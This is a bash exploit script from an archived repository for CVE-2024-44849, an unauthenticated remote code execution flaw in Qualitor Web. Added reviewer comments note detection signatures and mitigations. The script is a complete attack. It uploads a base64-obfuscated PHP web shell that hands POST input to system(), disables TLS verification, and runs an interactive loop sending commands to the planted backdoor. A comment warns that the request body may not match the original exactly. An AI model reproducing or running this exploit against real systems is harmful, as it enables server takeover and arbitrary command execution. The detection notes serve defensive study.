This repository has been archived by the owner on Oct 11, 2024. It is now read-only.
cve-2024-44849.bash
#!/bin/bash
# Author: Extencil <extencil@extencil.me>
# Date: September, 2024.
#
# CVE-2024-44849 Unauthenticated Remote Code Execution Exploit (CRITICAL)
#
# Reviewer summary (defensive reading of this artifact):
#   - Per the banner below, the affected product is Qualitor Web <= 8.24.
#   - The script sends one multipart POST to the checkAcesso.php endpoint
#     given as $1, carrying a PHP file in the form field "fleArquivo", and
#     then sends operator-typed commands to the uploaded file.
#   - Observable signals are noted inline next to the lines that produce them.
#   - NOTE(review): the forge reported this file as 90 lines (63 lines of
#     code); the blank lines do not appear in this listing, so the request
#     body below may not match byte-for-byte what the original sends. Treat
#     the field names and paths, not the exact layout, as the signature.
#   - Mitigation: move off the affected releases to a vendor-fixed version
#     (<FIXED_VERSION - not stated on this page>), block unauthenticated
#     access to the endpoint, and deny PHP execution in directories that
#     accept uploads.
echo "
Qualitor Web <= 8.24 RCE Exploit v1.0 (CVE-2024-44849)
By Extencil <extencil@extencil.me>, September 2024.
Using this program to attack or compromise any company or system without mutual consent is illegal. The author of this code does not take any responsibility for any misuse or illegal activities conducted using this software. It is intended for educational purposes and authorized testing only. Always ensure you have proper authorization before conducting any security assessments.
"
# $1 is the full URL of the checkAcesso.php endpoint (see the usage text).
URL=$1
# With no argument, print usage and do nothing else.
if [ $# -lt 1 ]; then
echo "
Usage:
$0 <url>
$0 https://csc.extencil.me/html/ad/adfilestorage/request/checkAcesso.php
"
else
echo "[*] Exploiting the target.."
# Define the file name and malicious content
# Detection: the uploaded file name is 16 characters drawn from [a-z0-9]
# followed by ".php"; a new file of that shape next to checkAcesso.php is a
# strong indicator of compromise.
FILENAME=$(< /dev/urandom tr -dc 'a-z0-9' | head -c 16)".php"
# The payload base64-decodes a short PHP snippet and eval()s it. Decoded, the
# snippet hands the POST field named "0" to PHP's system() and then stops,
# which matches the `-d 0=` request made in the loop at the end of the script.
MALICIOUS_CODE='<?php $i=base64_decode("aWYoaXNzZXQoJF9QT1NUWzBdKSl7c3lzdGVtKCRfUE9TVFswXSk7ZGllO30K");eval($i);?>' # The Hackers Choice <thc.org> Smallest PHP Backdoor
# The follow-up URL is the endpoint URL with the trailing "checkAcesso.php"
# replaced by the random file name, i.e. the script expects the upload to
# land in the same web-served directory as the endpoint.
BACKDOOR_URL=$(echo $URL | sed 's/checkAcesso.php$//')"$FILENAME"
# Boundary for multipart/form-data
# Detection: this boundary string is fixed, so it is usable as a network
# signature for unmodified copies of the script.
BOUNDARY="---------------------------QUALITORspaceCVEspace2024space44849"
# Create the POST request with curl using inline file content
echo "[*] Sending the backdoor.."
# One silent POST with TLS certificate verification disabled (--insecure).
# The Cookie header carries an empty "session820=" value, consistent with the
# "unauthenticated" claim in the header comment.
# Form fields sent: idtipo=2, nmdiretoriorede=".", fleArquivo (the PHP file),
# plus nmfilestorage, nmbucket, nmaccesskey, nmkeyid and cdfilestorage, which
# are left empty.
# NOTE(review): presumably nmdiretoriorede="." is what places the file in the
# endpoint's own directory - not verifiable from this script alone.
# Detection: a multipart POST to .../adfilestorage/request/checkAcesso.php
# whose fleArquivo part has a filename ending in ".php".
curl -X POST $URL -s --insecure \
-H "Cookie: XDEBUG_SESSION=ECLIPSE_DBGP; XDEBUG_SESSION=ECLIPSE_DBGP; B_protocol=https%3A; XDEBUG_SESSION=ECLIPSE_DBGP; SOLICITANTE=false; _LOGIN_SOLICITANTE_=padrao; ATENDENTE=false; session820=" \
-H "Content-Type: multipart/form-data; boundary=$BOUNDARY" \
--data-binary "--$BOUNDARY
Content-Disposition: form-data; name=\"idtipo\"
2
--$BOUNDARY
Content-Disposition: form-data; name=\"nmfilestorage\"
--$BOUNDARY
Content-Disposition: form-data; name=\"nmdiretoriorede\"
.
--$BOUNDARY
Content-Disposition: form-data; name=\"nmbucket\"
--$BOUNDARY
Content-Disposition: form-data; name=\"nmaccesskey\"
--$BOUNDARY
Content-Disposition: form-data; name=\"nmkeyid\"
--$BOUNDARY
Content-Disposition: form-data; name=\"fleArquivo\"; filename=\"$FILENAME\"
$MALICIOUS_CODE
--$BOUNDARY
Content-Disposition: form-data; name=\"cdfilestorage\"
--$BOUNDARY--"
echo
echo
# The script does not parse the response; the operator is told to look for
# the string 'Upload realizado com sucesso' in the output printed above.
# Detection: that string in a response to an unauthenticated request to this
# endpoint indicates the upload was accepted.
echo "[*] Target is vulnerable if 'Upload realizado com sucesso'."
echo
# Interactive loop: each line typed at the prompt is sent as the POST field
# "0" to the uploaded file's URL, and the response is printed. Typing "exit"
# ends the loop. The loop starts regardless of whether the upload succeeded.
# Detection: repeated POSTs with a form field literally named "0" to a
# 16-character .php file under the adfilestorage/request path.
while true; do
read -p "(backdoor@qualitor): $ " BackdoorCommand
if [[ "$BackdoorCommand" == "exit" ]]; then
echo "Exiting..."
break
fi
curl $BACKDOOR_URL -d 0="$BackdoorCommand"
done
fi